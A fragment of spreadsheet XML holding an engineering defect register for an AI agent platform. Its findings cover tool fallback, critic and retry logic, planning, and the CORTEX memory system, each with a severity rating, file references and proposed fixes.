**📄 Doc-reported · Medium**
The failure-classification and self-healing ladder exists **twice**: inline in
`_execute_tool_call` for direct `TOOL_CALL` steps, and in `ToolResilience` for the
REACT/AFC path.
The REACT path is gated on `tools.resilience_v2_enabled`. With that flag off, REACT tool
calls go straight to `ToolExecutor.execute_from_function_calls` with no reformat-retry and
no fallback — a silently different reliability level depending on which reasoning mode the
entity uses.
- [`ai/step_executor.py:870`](../../../backend/src/ai/step_executor.py:870) — the flag check
- [`ai/tools/resilience.py`](../../../backend/src/ai/tools/resilience.py)
**Fix:** finish the migration and delete the inline copy. Two implementations of one
ladder will drift.
---</t>
  </si>
  <si>
    <t>EP-23</t>
  </si>
  <si>
    <t>The fallback chain is one hop only</t>
  </si>
  <si>
    <t>### EP-23 — The fallback chain is one hop only
**📄 Doc-reported · Low**
`get_fallback_tool` returns the **first** alternative and there is no chain walk. So
`web_search → headless_browser` is the whole recovery; if the browser also fails, the step
returns `[TOOL_EMPTY]`.
Given the pairs are mutually reciprocal (`scraper_tool → headless_browser` and
`headless_browser → scraper_tool`), a chain walk would need loop protection anyway. Listed
so the limit is known rather than assumed.
- [`ai/tool_fallback.py:26`](../../../backend/src/ai/tool_fallback.py:26)
---</t>
  </si>
  <si>
    <t>EP-24</t>
  </si>
  <si>
    <t>The reformat retry is billed and easy to miss</t>
  </si>
  <si>
    <t>### EP-24 — The reformat retry is billed and easy to miss
**📄 Doc-reported · Low**
Every reformat attempt writes an `LLMInteractionLog` with `reasoning_mode="REFORMAT"` and
logs usage. That is correct — the call really costs money.
The trap is that it does not appear in the plan, in the step list or in the trace as a
distinct step. A run that quietly reformatted twenty tool calls looks the same as one that
did not, except for the bill.
- [`ai/step_executor.py:597`](../../../backend/src/ai/step_executor.py:597)–610
---</t>
  </si>
  <si>
    <t>PC-01</t>
  </si>
  <si>
    <t>The pre-critic is skipped on almost every iteration</t>
  </si>
  <si>
    <t>07. Planning, Critics &amp; Self-Correction</t>
  </si>
  <si>
    <t>### PC-01 — The pre-critic is skipped on almost every iteration
**✅ Verified · High**
```python
if move.plan_fragment:
    pre_verdict = PreCriticVerdict(kind="PASS")
else:
    pre_verdict = await self.critic_pipeline.pre_action(move, state)
```
Any move carrying a plan fragment gets a synthetic `PASS`. On a plan-driven run that is
every iteration.
The comment explains why, and the reasoning is sound: the deterministic Strategist
re-proposes the *identical* move each iteration, so one genuine `BLOCK` becomes three
consecutive blocks and trips the circuit breaker with zero work done. The bypass was a
fix for a real incident.
But the outcome is that the safety gate in front of every action is disabled on the path
that covers nearly all actions, and the code still reads as though it is enabled.</t>
  </si>
  <si>
    <t>- [`ai/core/agent_loop.py:457`](../../../backend/src/ai/core/agent_loop.py:457)
**Fix:** the underlying problem is that a blocked move is re-proposed unchanged. Make a
`BLOCK` mutate the move — or mark the step so the strategist proposes something else —
and the bypass is no longer needed.
---</t>
  </si>
  <si>
    <t>07-PLANNING-AND-CRITICS-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — Paying for criticism that is discarded</t>
  </si>
  <si>
    <t>PC-02</t>
  </si>
  <si>
    <t>REVISE from the pre-critic does nothing</t>
  </si>
  <si>
    <t>### PC-02 — `REVISE` from the pre-critic does nothing
**📄 Doc-reported · Medium**
The loop branches only on `BLOCK`. A `REVISE` verdict — the critic saying "this is
nearly right, change it like this" — is produced, billed, and ignored.
So the pre-critic is effectively a binary gate with three declared outcomes.
- [`ai/core/agent_loop.py`](../../../backend/src/ai/core/agent_loop.py) — phase 3
---</t>
  </si>
  <si>
    <t>PC-03</t>
  </si>
  <si>
    <t>Alignment drift is measured and discarded</t>
  </si>
  <si>
    <t>### PC-03 — Alignment drift is measured and discarded
**📄 Doc-reported · High**
`AlignmentVerdict.correction_hint` is populated by the alignment critic and dropped on the
AgentLoop path. Only the legacy step engine acts on drift, through
`__alignment_correction__`.
So on the live path the platform pays an LLM call to detect that the agent has wandered
off goal, records the number, and then does nothing about it.
Worse, `AlignmentVerdict` has **no cost field**, so alignment cost never reaches
`run.total_cost_usd` either. The call is billed to the provider and invisible in the
platform's own accounting.
- [`ai/planning/critic_pipeline.py`](../../../backend/src/ai/planning/critic_pipeline.py) — `alignment`
- [`ai/core/agent_loop.py`](../../../backend/src/ai/core/agent_loop.py) — the caller that drops the hint
---</t>
  </si>
  <si>
    <t>PC-04</t>
  </si>
  <si>
    <t>The post critic never sees intelligence rules</t>
  </si>
  <si>
    <t>### PC-04 — The post critic never sees intelligence rules
**✅ Verified · Medium**
`_build_real_critic_pipeline` passes `intelligence_reader=None`, with the comment
`# wired in Track 6`.
`CriticPipeline` accepts the reader, stores it, and passes it to the supervisor. With it
`None`, `intel_rules` renders as `"(none)"` in every critic prompt.
The IntelligenceTree — where `CriticCalibrator` writes its weekly false-pass and
false-fail findings — is therefore write-only from the critic's point of view. The
platform learns and then does not read what it learned.
- [`ai/core/agent_loop.py:930`](../../../backend/src/ai/core/agent_loop.py:930) — `intelligence_reader=None`
- [`ai/planning/critic_pipeline.py:241`](../../../backend/src/ai/planning/critic_pipeline.py:241)
---</t>
  </si>
  <si>
    <t>PC-05</t>
  </si>
  <si>
    <t>DEGRADED mode still runs the post critic</t>
  </si>
  <si>
    <t>### PC-05 — `DEGRADED` mode still runs the post critic
**📄 Doc-reported · Medium**
The budget guard switches to `CriticMode.DEGRADED` when
`critic_cost / run_cost &gt; critic_cost_share_pct`. The module docstring says degraded mode
runs a "minimal post" critic. It runs the full one.
So the cost control that exists to stop criticism eating the run's budget does not
actually reduce the most expensive stage.
- [`ai/planning/critic_pipeline.py`](../../../backend/src/ai/planning/critic_pipeline.py) — `_budget_mode`
Note also that the threshold `governance.critic_cost_share_pct` is **not a declared
Pydantic field**, so it cannot be set through the API — see
[PC-16](#pc-16--every-critic-knob-in-governance-is-undeclared).
---</t>
  </si>
  <si>
    <t>PC-06</t>
  </si>
  <si>
    <t>Every retry strategy executes identically</t>
  </si>
  <si>
    <t>### PC-06 — Every retry strategy executes identically
**✅ Verified · High**
`pick_retry` chooses between seven strategies:
| Strategy | What it is supposed to change |
|---|---|
| `RETRY_AS_IS` | nothing |
| `RETRY_DIFFERENT_TOOL` | use the fallback tool |
| `RETRY_DIFFERENT_PROMPT` | rewrite the prompt |
| `RETRY_DIFFERENT_MODEL` | escalate to a stronger model |
| `ASK_USER` | pause for clarification |
| `ABANDON` | stop |
| `NONE` | no retry needed |
The choice is made, logged, and emitted as an `agent.retry.picked` event. Then
`_move_from_retry` rehydrates the queued retry into a `Move`:
```python
return Move(
    move_id=...,</t>
  </si>
  <si>
    <t>goal_id=state.current_goal_id(),
    executor=queued.get("executor", "SingleStep"),
    plan_fragment=plan_fragment,
    rationale=queued.get("rationale", "queued retry"),
)
```
`force_model_escalation`, `prompt_rewrite_hint`, `use_fallback_tool` and `ask_user` are
all dropped. **Every queued retry behaves like `RETRY_AS_IS`** — the same tool, the same
prompt, the same model.
So the platform diagnoses *why* a step failed, picks the right remedy, and then retries
identically. The retry telemetry in the UI shows a strategy that was never applied.
- [`ai/core/agent_loop.py:1464`](../../../backend/src/ai/core/agent_loop.py:1464) — `_move_from_retry`
- [`ai/planning/retry_strategies.py`](../../../backend/src/ai/planning/retry_strategies.py) — `pick_retry`
**Fix:** carry the strategy fields onto the `Move` and have the executor honour them.
This is the single highest-value change in this register.
---</t>
  </si>
  <si>
    <t>3. T1 — Self-correction that does not correct</t>
  </si>
  <si>
    <t>PC-07</t>
  </si>
  <si>
    <t>There is no retry backoff</t>
  </si>
  <si>
    <t>### PC-07 — There is no retry backoff
**✅ Verified · Medium**
`LogicGate.retry_policy` — with `max_retries`, `backoff_strategy` and `retry_on` — is
schema-only. Nothing reads it (see
[EP-05](06-EXECUTION-PIPELINE-DEFECTS.md#ep-05--eight-settings-in-the-builder-have-no-runtime-reader)).
Retries are immediate. Against a rate-limited API — the most common transient failure —
an immediate retry is the one thing guaranteed not to work.
---</t>
  </si>
  <si>
    <t>PC-08</t>
  </si>
  <si>
    <t>FailureTag.severity is dead</t>
  </si>
  <si>
    <t>### PC-08 — `FailureTag.severity` is dead
**📄 Doc-reported · Low**
`pick_retry` branches on tag identity, not severity. The severity field is populated by
the critic and never consulted, so a `CRITICAL` hallucination and a `LOW` formatting
wobble follow the same path if they carry the same tag.
---</t>
  </si>
  <si>
    <t>PC-09</t>
  </si>
  <si>
    <t>REPLAN clears completed step ids for dynamic entities</t>
  </si>
  <si>
    <t>### PC-09 — `REPLAN` clears completed step ids for dynamic entities
**📄 Doc-reported · Medium**
The wipe is guarded for static-plan entities only. A dynamic-plan entity whose supervisor
recommends `REPLAN` really does restart its plan from scratch, re-running and re-paying
for work already done.
Same defect as [AK-17](05-AGENT-KERNEL-DEFECTS.md#ak-17--_handle_replan-wipes-completed-step-ids-for-dynamic-plans),
recorded here because the trigger lives in the supervisor.
---</t>
  </si>
  <si>
    <t>PC-10</t>
  </si>
  <si>
    <t>Only one of GoalGuard's four actions is reachable</t>
  </si>
  <si>
    <t>### PC-10 — Only one of `GoalGuard`'s four actions is reachable
**📄 Doc-reported · Medium**
`MetaReviewer`, `GoalGuard` and `AlignmentCritic` are all shims over the new pipeline.
Only `GoalGuard` has a live caller, and only its `RETRY` branch is reachable — the other
three actions cannot fire.
Three classes remain in the tree looking like working components. Two have no live caller
at all.
- [`ai/planning/goal_guard.py`](../../../backend/src/ai/planning/goal_guard.py)
- [`ai/core/meta_review.py`](../../../backend/src/ai/core/meta_review.py)
---</t>
  </si>
  <si>
    <t>PC-11</t>
  </si>
  <si>
    <t>TrustLearner + source_trust_scores</t>
  </si>
  <si>
    <t>| **PC-11** | `TrustLearner` + `source_trust_scores` | Beta-posterior trust learning per knowledge source. Table, migration, maths and unit tests all shipped. Grep finds `TrustLearner` referenced **only from its own module and its test**. The flag `memory.trust_score_learning` defaults `False` | ✅ Verified |</t>
  </si>
  <si>
    <t>4. T2 — Built and never wired</t>
  </si>
  <si>
    <t>PC-12</t>
  </si>
  <si>
    <t>FailurePatternService</t>
  </si>
  <si>
    <t>| **PC-12** | `FailurePatternService` | Mines an entity's recent failures into prompt-injectable warnings, with seven classifiers. Its own docstring says "Usage (from `worker.py`)" — `worker.py` no longer contains that call. **Zero production callers** | ✅ Verified |</t>
  </si>
  <si>
    <t>PC-13</t>
  </si>
  <si>
    <t>PlanGenerator.replan</t>
  </si>
  <si>
    <t>| **PC-13** | `PlanGenerator.replan` | **No callers.** Re-planning goes through `PlannerService.adapt_plan`, which passes `entity=None` and therefore disables three of the eight plan invariants and skips billing the replan tokens | ✅ Verified |</t>
  </si>
  <si>
    <t>PC-14</t>
  </si>
  <si>
    <t>PlanGenerator telemetry</t>
  </si>
  <si>
    <t>| **PC-14** | `PlanGenerator` telemetry | Always constructed as `PlanGenerator(llm_router=..., db=...)` with no `emit_event`, so **no `agent.plan.*` event ever fires**. Planning is invisible in the trace | ✅ Verified |</t>
  </si>
  <si>
    <t>PC-15</t>
  </si>
  <si>
    <t>Six of eight bandit arms</t>
  </si>
  <si>
    <t>| **PC-15** | Six of eight bandit arms | `PlanStyleBandit` declares eight plan styles. The selection path only ever decides `DAG_PARALLEL` vs `DAG_SEQUENTIAL`. The other arms are recorded in the table and never chosen | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>PC-16</t>
  </si>
  <si>
    <t>Every critic knob in governance is undeclared</t>
  </si>
  <si>
    <t>### PC-16 — Every critic knob in `governance` is undeclared
**📄 Doc-reported · Medium**
`critic_cost_share_pct`, `goal_validation_interval`, `meta_review_interval` and
`review_mechanism.critic_model_override` are all read by the runtime and have **no
Pydantic field**.
Because the entity schema is closed and drops unknown keys silently, setting any of them
through the API is a no-op that returns `200 OK`. A typo fails the same silent way.
These are the four knobs you would reach for to tune critic cost — the most expensive
part of a run — and none of them can be set.
---</t>
  </si>
  <si>
    <t>5. T3 — Planning correctness</t>
  </si>
  <si>
    <t>PC-17</t>
  </si>
  <si>
    <t>Two different goal_validation_interval settings</t>
  </si>
  <si>
    <t>### PC-17 — Two different `goal_validation_interval` settings
**📄 Doc-reported · Medium**
One lives in `governance` (read by the AgentLoop, default 2). The other lives in
`logic_gate.reasoning_config` (read by the legacy step engine; the schema default is 2
but the raw dict is read as 0, i.e. off).
Only the governance one affects the live loop. Setting the other has no effect, and both
appear in the builder.
---</t>
  </si>
  <si>
    <t>PC-18</t>
  </si>
  <si>
    <t>_assign_step_ids breaks the LLM's own placeholders</t>
  </si>
  <si>
    <t>### PC-18 — `_assign_step_ids` breaks the LLM's own placeholders
**📄 Doc-reported · High**
The planner asks the LLM for a plan whose steps reference each other with `{{step_1}}`
placeholders. `_assign_step_ids` then rewrites **every** generated `step_id`.
The placeholders still say `{{step_1}}`; the step is now called something else. So on the
dynamic-planning path, inter-step references silently stop resolving and downstream steps
run with missing input.
- [`ai/planning/plan_generator.py`](../../../backend/src/ai/planning/plan_generator.py) — `_assign_step_ids`
**Fix:** rewrite the placeholders in the same pass that rewrites the ids.
---</t>
  </si>
  <si>
    <t>PC-19</t>
  </si>
  <si>
    <t>One plan invariant fails for every tool-bearing entity</t>
  </si>
  <si>
    <t>### PC-19 — One plan invariant fails for every tool-bearing entity
**📄 Doc-reported · Medium**
`all_required_tools_in_capabilities` stringifies tool dicts before comparing them. For a
real entity — whose `capabilities.tools` is a list of `{"tool_id": ...}` dicts, not
strings — the comparison never matches, so the invariant fails for exactly the entities it
exists to protect.
- [`ai/planning/plan_invariants.py`](../../../backend/src/ai/planning/plan_invariants.py)
---</t>
  </si>
  <si>
    <t>PC-20</t>
  </si>
  <si>
    <t>adapt_plan disables three invariants and skips billing</t>
  </si>
  <si>
    <t>### PC-20 — `adapt_plan` disables three invariants and skips billing
**✅ Verified · Medium**
`PlannerService.adapt_plan` calls the generator with `entity=None`. Three of the eight
invariants need the entity and are skipped. The replan's tokens are also not billed to the
run.
So a run that replans repeatedly gets progressively less-validated plans, for free — which
removes the cost signal that would otherwise discourage replan loops.
- [`ai/planning/planner_service.py:283`](../../../backend/src/ai/planning/planner_service.py:283)
---</t>
  </si>
  <si>
    <t>PC-21</t>
  </si>
  <si>
    <t>Bandit reward is run-level and blames every arm equally</t>
  </si>
  <si>
    <t>### PC-21 — Bandit reward is run-level and blames every arm equally
**📄 Doc-reported · Medium**
All arms used in a failed run are penalised the same amount, and per-arm cost is computed
as the run total divided by the iteration count.
So an arm that was used once in a 40-iteration run that failed for an unrelated reason
takes a full penalty. With ε-greedy selection over a small number of runs, that is enough
to push a good arm out of contention permanently.
- [`ai/planning/plan_style_bandit.py`](../../../backend/src/ai/planning/plan_style_bandit.py)
---</t>
  </si>
  <si>
    <t>PC-22</t>
  </si>
  <si>
    <t>Calibration groups by a key the bandit does not use</t>
  </si>
  <si>
    <t>### PC-22 — Calibration groups by a key the bandit does not use
**📄 Doc-reported · Medium**
`CriticCalibrator` buckets by `entity_id` plus a `task_class` derived as
`entity_type:{type}` or `run:{execution_mode}`. The bandit keys on `state.task_class`,
which is produced by the task classifier.
The two grouping keys do not line up, so calibration findings and bandit statistics can
never be joined. The write is also duck-typed — it looks for `upsert_calibration_rule`,
then `record_rule`, and logs-and-returns if neither exists.
- [`ai/planning/critic_calibration.py:73`](../../../backend/src/ai/planning/critic_calibration.py:73)
---</t>
  </si>
  <si>
    <t>MC-01</t>
  </si>
  <si>
    <t>CORTEX is write-only on the live path</t>
  </si>
  <si>
    <t>08. Memory, CORTEX &amp; Retrieval</t>
  </si>
  <si>
    <t>### MC-01 — CORTEX is write-only on the live path
**✅ Verified · Critical**
The write side is fully wired. `StepEngine` constructs a `CortexBridge` and uses it on
every step:
| Write operation | Called from |
|---|---|
| `write_step` | every step completion |
| `ingest_tool_result` | scraper and browser results become knowledge nodes |
| `write_reflection` | the reflector |
| `write_checkpoint` / `buffer_node` / `flush_buffer` | checkpointing |
The read side has **no production callers at all**:
| Read operation | Callers found in `backend/src` |
|---|---|
| `assemble_memory` — builds the whole `__memory__` block | **none** |
| `CortexBridge.get_relevant_knowledge` | **none** |
| `CortexBridge.refresh_viewport` | **none** |
| `CortexBridge.get_knowledge_tree_references` | **none** |</t>
  </si>
  <si>
    <t>And the one place that would consume it is hard-wired off:
```python
self.perceiver = Perceiver(db=self.db, cortex=self.cortex, memory_assembler=None)
```
`step_executor` goes further and actively **strips** `__memory__`,
`__episodic_memory__`, `__semantic_context__`, `__memory_context__` and
`__context_sources__` out of a child's context.
So today the platform: writes every step into a tree, embeds nodes at real cost, runs
dreaming to distil intelligence rules, maintains four memory domains and a semantic
graph — and injects **none of it** into any prompt. An agent's tenth run knows exactly
what its first run knew.
- [`ai/core/agent_loop.py:766`](../../../backend/src/ai/core/agent_loop.py:766) — `memory_assembler=None`
- [`ai/memory/assembler.py:19`](../../../backend/src/ai/memory/assembler.py:19) — `assemble_memory`, no callers
- [`ai/memory/cortex_bridge.py:498`](../../../backend/src/ai/memory/cortex_bridge.py:498) — `get_relevant_knowledge`, no callers
- [`ai/step_executor.py:211`](../../../backend/src/ai/step_executor.py:211)–226 — the strip</t>
  </si>
  <si>
    <t>**Fix:** pass a real assembler to the `Perceiver` and feed `Perception.to_prompt_block()`
into the prompt. This is one argument and one prompt-block insertion, and it is the
difference between having a memory system and paying for one.
See also [AK-05](05-AGENT-KERNEL-DEFECTS.md#ak-05--perception-is-written-every-iteration-and-read-by-nothing)
and [AK-06](05-AGENT-KERNEL-DEFECTS.md#ak-06--the-perceivers-richest-fields-are-always-empty)
— the kernel-side view of the same gap.
---</t>
  </si>
  <si>
    <t>08-MEMORY-AND-CORTEX-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — Memory that is written and never read</t>
  </si>
  <si>
    <t>MC-02</t>
  </si>
  <si>
    <t>The scheduled dreaming job has never run</t>
  </si>
  <si>
    <t>### MC-02 — The scheduled dreaming job has never run
**✅ Verified · High**
`dreaming_cron_trigger` is registered as a cron and fires at 00:15, 06:15, 12:15 and
18:15. It enqueues by string name:
```python
await arq.enqueue_job("dreaming_worker", entity_id, company_id, False)
```
`dreaming_worker` is **imported** by `worker.py` but does not appear in
`WorkerSettings.functions`. The worker rejects every job the cron schedules.
Only the outcome-triggered path (`dreaming_outcome_trigger`, which *is* registered) works.
So consolidation happens only when a run finishes, subject to the 24-hour gate — the
scheduled sweep across all entities has never happened.
`graph_maintenance_worker` — edge-weight decay and pruning of the semantic graph — is in
the same position and has **no caller at all**, so the graph is never maintained.
- [`ai/worker.py`](../../../backend/src/ai/worker.py) — the `functions` list</t>
  </si>
  <si>
    <t>- [`ai/core/arq_jobs.py`](../../../backend/src/ai/core/arq_jobs.py) — `dreaming_worker`, `graph_maintenance_worker`
- Same defect as [SA-06](02-SYSTEM-ARCHITECTURE-DEFECTS.md#sa-06--the-6-hourly-dreaming-cron-enqueues-a-job-the-worker-cannot-run)
---</t>
  </si>
  <si>
    <t>MC-03</t>
  </si>
  <si>
    <t>Intelligence rules are distilled and never consumed</t>
  </si>
  <si>
    <t>### MC-03 — Intelligence rules are distilled and never consumed
**✅ Verified · High**
Rules earn their way into prompts through a lifecycle: `candidate` → `confirmed` at three
net validations. `CriticCalibrator` writes calibration findings into the same tree weekly.
Nothing reads them. `intelligence_reader` is hard-coded to `None` in the critic pipeline
construction, and `assemble_memory` — the other consumer — has no callers
([MC-01](#mc-01--cortex-is-write-only-on-the-live-path)).
So the rule lifecycle runs to completion and the confirmed rules sit in the tree.
- [`ai/core/agent_loop.py:930`](../../../backend/src/ai/core/agent_loop.py:930) — `intelligence_reader=None`
- Also recorded as [PC-04](07-PLANNING-AND-CRITICS-DEFECTS.md#pc-04--the-post-critic-never-sees-intelligence-rules)
---</t>
  </si>
  <si>
    <t>MC-04</t>
  </si>
  <si>
    <t>Embeddings are paid for and rarely searched</t>
  </si>
  <si>
    <t>### MC-04 — Embeddings are paid for and rarely searched
**✅ Verified · Medium**
`EmbeddingService` embeds every CORTEX node, batches at 100, and writes an attributed
`usage_logs` row per batch with `attribution="embedding"`. That is real, metered spend on
every ingestion.
The search paths that would use those vectors are the ones with no callers
([MC-01](#mc-01--cortex-is-write-only-on-the-live-path)). The CORTEX explorer UI and the
`/documents/search` endpoint do search, so the spend is not entirely wasted — but the
agent-facing retrieval that justifies embedding *every node* does not happen.
- [`ai/memory/embedding_service.py`](../../../backend/src/ai/memory/embedding_service.py)
---</t>
  </si>
  <si>
    <t>MC-05</t>
  </si>
  <si>
    <t>memory_pipeline="v1" is accepted and ignored</t>
  </si>
  <si>
    <t>### MC-05 — `memory_pipeline="v1"` is accepted and ignored
**✅ Verified · Medium**
`assemble_memory(..., memory_pipeline: str = "v2")` documents the argument as "retained
for call-site compatibility; ignored (always v2)". The memory README still describes
`memory_service.py` as "reachable only when `memory_pipeline='v1'`" — it is not reachable
at all.
So there are two documented pipelines, one implementation, and a deprecated module kept
alive by a docstring.
- [`ai/memory/assembler.py:26`](../../../backend/src/ai/memory/assembler.py:26)
- [`ai/memory/README.md`](../../../backend/src/ai/memory/README.md)
---</t>
  </si>
  <si>
    <t>3. T1 — Silent failure and silent no-ops</t>
  </si>
  <si>
    <t>MC-06</t>
  </si>
  <si>
    <t>Every retrieval failure is silent</t>
  </si>
  <si>
    <t>### MC-06 — Every retrieval failure is silent
**📄 Doc-reported · High**
Every domain assembler catches broad `Exception`, logs at `debug`, and returns `[]`.
An agent whose memory retrieval is broken — bad credentials, a missing index, a schema
mismatch — behaves **exactly** like an agent that has not learned anything yet. There is
no error, no metric, and nothing on the run trace.
This is why [MC-01](#mc-01--cortex-is-write-only-on-the-live-path) could exist unnoticed:
the observable behaviour of "memory not wired" and "memory returning nothing" is
identical.
- [`ai/memory/assembler.py:68`](../../../backend/src/ai/memory/assembler.py:68)
- `cortex_memory.assembly` in the installed package
**Fix:** count retrieval failures and surface them on the run trace. `[]` from an error
and `[]` from an empty tree must be distinguishable.
---</t>
  </si>
  <si>
    <t>MC-07</t>
  </si>
  <si>
    <t>FULL and RUN_SCOPED memory scopes are identical</t>
  </si>
  <si>
    <t>### MC-07 — `FULL` and `RUN_SCOPED` memory scopes are identical
**📄 Doc-reported · Medium**
Both map to all four memory domains. The builder offers them as different choices and
they produce the same behaviour.
---</t>
  </si>
  <si>
    <t>MC-08</t>
  </si>
  <si>
    <t>A new entity learns nothing for five runs, then once a day</t>
  </si>
  <si>
    <t>### MC-08 — A new entity learns nothing for five runs, then once a day
**📄 Doc-reported · Medium**
`MIN_EPISODES_FOR_DREAMING = 5` and `CONSOLIDATION_INTERVAL_HOURS = 24`. Below five
completed runs, dreaming does nothing at all; above it, at most once per entity per day.
That is a defensible design for a mature entity and a poor one for the first day of a new
tenant, which is exactly when someone is evaluating whether the platform learns. The
admin trigger's `force=True` bypass exists, but nothing in the product surfaces it.
- `cortex_memory_moved_to_pypi_repo/dreaming.py` — the thresholds
---</t>
  </si>
  <si>
    <t>MC-09</t>
  </si>
  <si>
    <t>recurse() creates a run and does not enqueue it</t>
  </si>
  <si>
    <t>### MC-09 — `recurse()` creates a run and does not enqueue it
**📄 Doc-reported · Medium**
`recurse()` creates the CORTEX node and the `execution_runs` row, and returns. The caller
must push the job to Arq itself.
Any caller that forgets leaves a `PENDING` run that will never execute and never be
cleaned up — the same silent-stall shape as
[SA-I4](02-SYSTEM-ARCHITECTURE-DEFECTS.md#sa-i4--give-the-worker-a-health-signal).
---</t>
  </si>
  <si>
    <t>MC-10</t>
  </si>
  <si>
    <t>CORTEX tables have no foreign keys to host tables</t>
  </si>
  <si>
    <t>### MC-10 — CORTEX tables have no foreign keys to host tables
**📄 Doc-reported · High**
A deliberate design choice: the `cortex_memory` package owns its own declarative `Base`,
and external references (`company_id`, `entity_id`, `execution_run_id`) are opaque
nullable UUIDs.
The consequence is that **deleting a company leaves orphaned trees**, nodes and edges
forever. There is no cascade and no cleanup job. Referential integrity is
application-level, and no application code enforces it.
At current volume this is invisible. It becomes a data-retention and privacy problem the
first time a tenant asks for their data to be deleted.
- `cortex_memory_moved_to_pypi_repo/db.py`
**Fix:** a deletion job that walks trees by `company_id` when a company is removed. It
does not need foreign keys, it needs an owner.
---</t>
  </si>
  <si>
    <t>4. T2 — Structural gaps</t>
  </si>
  <si>
    <t>MC-11</t>
  </si>
  <si>
    <t>The vector dimension is hard-coded in two places</t>
  </si>
  <si>
    <t>### MC-11 — The vector dimension is hard-coded in two places
**✅ Verified · Medium**
`_CORTEX_EMBEDDING_DIM = 768` in `cortex_providers.py`, and
`Vector(768)` on `document_chunks.embedding`.
Switching to any embedding model with a different width — which the model-resolution
chain permits, since it reads whatever is configured in `integration_registry` — breaks
every insert with a dimension mismatch. There is no validation at model-selection time.
- [`ai/memory/cortex_providers.py:28`](../../../backend/src/ai/memory/cortex_providers.py:28)
- [`ai/orm/document.py:47`](../../../backend/src/ai/orm/document.py:47)
**Fix:** validate the resolved model's dimension against the column at startup, and fail
loudly rather than at the first insert.
---</t>
  </si>
  <si>
    <t>MC-12</t>
  </si>
  <si>
    <t>### MC-12 — `document_chunks.embedding` has no ANN index
**✅ Verified · Medium**
`cortex_nodes.embedding` gets an HNSW index. `document_chunks.embedding` gets none, so
the legacy RAG search is a sequential scan computing cosine distance per row.
Same entry as [DM-07](03-DATA-MODEL-DEFECTS.md#dm-07--document_chunksembedding-has-no-ann-index).
---</t>
  </si>
  <si>
    <t>MC-13</t>
  </si>
  <si>
    <t>The pgvector index is not in the model definition</t>
  </si>
  <si>
    <t>### MC-13 — The pgvector index is not in the model definition
**📄 Doc-reported · Medium**
The HNSW index on `cortex_nodes.embedding` exists only in a migration, not in the ORM
model. So `alembic autogenerate` cannot see it, and a database built by any other route
will silently do sequential scans.
There is no startup check that the index exists.
---</t>
  </si>
  <si>
    <t>MC-14</t>
  </si>
  <si>
    <t>Two chunkers with different sizes</t>
  </si>
  <si>
    <t>### MC-14 — Two chunkers with different sizes
**📄 Doc-reported · Medium**
`KnowledgeTreeService` chunks at 500 characters with 50 overlap.
`CortexIngestionPipeline` chunks at 2000 with no overlap. Which one runs depends on which
ingestion path the document took.
So the same document ingested two ways produces different chunks, different embeddings and
different retrieval behaviour, with nothing recording which path was used.
---</t>
  </si>
  <si>
    <t>MC-15</t>
  </si>
  <si>
    <t>The viewport's current node ignores max_chars</t>
  </si>
  <si>
    <t>### MC-15 — The viewport's current node ignores `max_chars`
**📄 Doc-reported · Medium**
The bounded viewport exists to cap how much context memory can consume. The **current**
node is rendered outside that budget, so a node with a large summary blows the limit by
itself.
Since the viewport is not reaching any prompt today
([MC-01](#mc-01--cortex-is-write-only-on-the-live-path)), this is latent. It becomes live
the moment MC-01 is fixed, which is the reason to fix it in the same change.
---</t>
  </si>
  <si>
    <t>5. T3 — Inconsistency and cost</t>
  </si>
  <si>
    <t>MC-16</t>
  </si>
  <si>
    <t>Invariant 1 raises during ordinary development</t>
  </si>
  <si>
    <t>### MC-16 — Invariant 1 raises during ordinary development
**📄 Doc-reported · Low**
`write()` raises `ValueError` if the parent node has no `summary`. It is a real invariant
— an unsummarised parent breaks viewport rendering — but it fires as a hard exception at
write time, far from the code that created the parent.
**Fix:** generate a placeholder summary at node creation, or raise at creation time where
the fix is obvious.
---</t>
  </si>
  <si>
    <t>MC-17</t>
  </si>
  <si>
    <t>retired intelligence rules can never come back</t>
  </si>
  <si>
    <t>### MC-17 — `retired` intelligence rules can never come back
**📄 Doc-reported · Low**
The lifecycle transition is one-way. A rule retired because it looked wrong during one bad
week is gone permanently, even if later evidence supports it.
Given that `CriticCalibrator` computes false-fail rates, the data to un-retire exists.
---</t>
  </si>
  <si>
    <t>MC-18</t>
  </si>
  <si>
    <t>The legacy episodic table is still read</t>
  </si>
  <si>
    <t>### MC-18 — The legacy episodic table is still read
**📄 Doc-reported · Medium**
`episodic_memories` is v1 memory. `legacy_episodic_reader.py` still reads it, and the
backfill script `episodic_to_trees.py` exists to migrate it into v2 Episodic Trees — but
it is a manual, one-off script.
So there are two episodic stores, one of them frozen, and which one an entity's history
lives in depends on whether someone ran a script.
Same shape as the `assets` table in
[DM-10](03-DATA-MODEL-DEFECTS.md#4-t2--wrong-types-and-dead-tables): a migration that
stopped at "the new thing works".
- [`ai/memory/legacy_episodic_reader.py`](../../../backend/src/ai/memory/legacy_episodic_reader.py)
- [`backend/scripts/migrations/episodic_to_trees.py`](../../../backend/scripts/migrations/episodic_to_trees.py)
---</t>
  </si>
  <si>
    <t>MC-19</t>
  </si>
  <si>
    <t>Adding an internal context key requires two edits or a test fails</t>
  </si>
  <si>
    <t>### MC-19 — Adding an internal context key requires two edits or a test fails
**📄 Doc-reported · Low**
A new key must be added to both `constants.py` and `INTERNAL_KEYS.md`, or
`test_internal_keys_documented` fails.
That is a reasonable guard. The cost is that `INTERNAL_KEYS.md` is already stale in at
least one place — it documents `__completed_steps__`, which nothing writes — so the test
enforces that the list is complete, not that it is correct.
---</t>
  </si>
  <si>
    <t>MC-20</t>
  </si>
  <si>
    <t>Most of src/ai/memory/ is shims over an unversioned local package</t>
  </si>
  <si>
    <t>### MC-20 — Most of `src/ai/memory/` is shims over an unversioned local package
**✅ Verified · Medium**
Fourteen files in `src/ai/memory/` are under 100 lines and re-export from
`cortex_memory`. The real code lives in `backend/cortex_memory_moved_to_pypi_repo/`,
declared in `pyproject.toml` as `hb-cortex-memory = "0.1.0"`.
The directory name says the package was moved to PyPI; the code is still in this
repository. So there are two possible sources of truth for the memory implementation and
no way to tell from the import which one is installed.
The repository's only CI workflow is pinned to `paths: ["backend/cortex_memory/**"]` — a
path that no longer exists — so this package has no test gate either. See
[19 — Testing](19-TESTING-DEFECTS.md).
- [`backend/pyproject.toml:53`](../../../backend/pyproject.toml:53)
- [`backend/cortex_memory_moved_to_pypi_repo/`](../../../backend/cortex_memory_moved_to_pypi_repo/)
---</t>
  </si>
